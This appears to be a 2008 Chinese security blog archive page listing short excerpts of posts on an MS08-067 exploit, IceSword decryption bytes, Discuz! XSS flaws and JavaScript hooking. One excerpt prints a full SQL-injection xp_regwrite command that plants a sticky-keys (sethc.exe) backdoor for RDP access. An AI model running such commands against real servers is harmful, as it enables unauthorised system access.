2008年10月 的日志

MS08-067 Remote Stack Overflow Vulnerability Exploit

# 鬼仔:编译好的 ms08067.rar

Author:  Polymorphours
Email:   [email protected]
Homepage:http://www.whitecell.org
Date:    2008-10-28

#include "stdafx.h"
#include <winsock2.h>
#include <Rpc.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
#pragma comment(lib, "ws2_32")
 阅读全文 »
Tags: , ,

ICESWORD各版本驱动通讯解密代码

作者:MJ0011

icesword同驱动通讯时会将input buffer加密,下面是各版本的解密代码:

包括1.2, 1.18 , 1.2版本的中英文版本

unsigned char is_ddata_en[32] = {
0x10, 0x4F, 0xAC, 0x2D, 0x94, 0x97, 0x95, 0xEE, 0x93, 0x25, 0x8A, 0xB6, 0xD6, 0xBE, 0x49, 0x4D,
0x3F, 0x94, 0x1A, 0x91, 0x30, 0xC4, 0x7B, 0x08, 0x59, 0x38, 0x7C, 0x3B, 0x52, 0x40, 0xD2, 0xD2
};
阅读全文 »

Tags:

3389新思路

版权所有:BK瞬间群
作者:BK群某饮料

1.能修改注册表
2.能访问3389

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--

阅读全文 »

Tags: ,

CMD下设置网关

作者:Innfen

上次导数据库的时候不幸把这个导丢了,今天刚好注射攻击的时候,那数据库机器没设置网关,那就自己加一个先试试看了,搞不好可以直接上网了,网关的ip不知道,只好写个批处理来探测,看运气咯
阅读全文 »

Tags: ,

MS08-067 Exploit for CN 2k/xp/2003 .net version

作者:cnqing

来源于EMM’s Exp,以socket方式重放攻击。
本机可为任意平台,从这个角度讲成功率稍高于EMM’S exp。
原版不成功时,可以试试这个。
阅读全文 »

Tags: ,

Some Of Discuz! Bugs

“Crossday Discuz! Board 论坛系统(简称 Discuz! 论坛,中国国家版权局著作权登记号 2006SR11895)是一个采用 PHP 和 MySQL 等其他多种数据库构建的高效论坛解决方案。作为商业软件产品, Discuz! 在代码质量,运行效率,负载能力,安全等级,功能可操控性和权限严密性等方面都在广大用户中有良好的口碑。凭借 Discuz! 开发组长期积累的丰富的 web 开发及数据库经验,和强于创新,追求完美的设计理念,使得 Discuz! 在很短时间内以其鲜明的个性特色从国内外同类产品中脱颖而出。经过了效率最优化和负载能力最佳化设计的 Discuz! ,已获得业内越来越多专家和权威企业的认可。”以上是官方自己的介绍。

地址:http://www.80vul.com/dzvul/

Tags: , ,

Discuz! [flash] xss bug

author: 80vul-A
team:http://www.80vul.com

一 分析
其实该漏洞在2007年就公布过了[1],但是经过80vul-A测试改漏洞一直没有被修补。该漏洞的分析主要点如下:

第一:Discuz!把allowScriptAccess设置为sameDomain:<param name=”allowScriptAccess” value=”sameDomain”>我们只需要把swf文件上传到目标上就可以使用[flash]调用我们构造的swf了。
阅读全文 »

Tags: , , ,

Anehta — hook任意javascript函数

作者:

其实,JS中最简单的hook是直接重载目标函数。在之前提到的“JSON Hijacking”中就是使用的这种方法。

简单来说,就是把目标函数重新定义一遍,这样就会覆盖掉原来的函数,当函数执行时,就会跑去执行新的函数了。

但是这种方法效率不高,且通用性不好,所以我在Anehta 中重新实现了一次通用的hook函数。

Anehta 中的hook方法包括三个:hook、unhook、injectFn
阅读全文 »

Tags: ,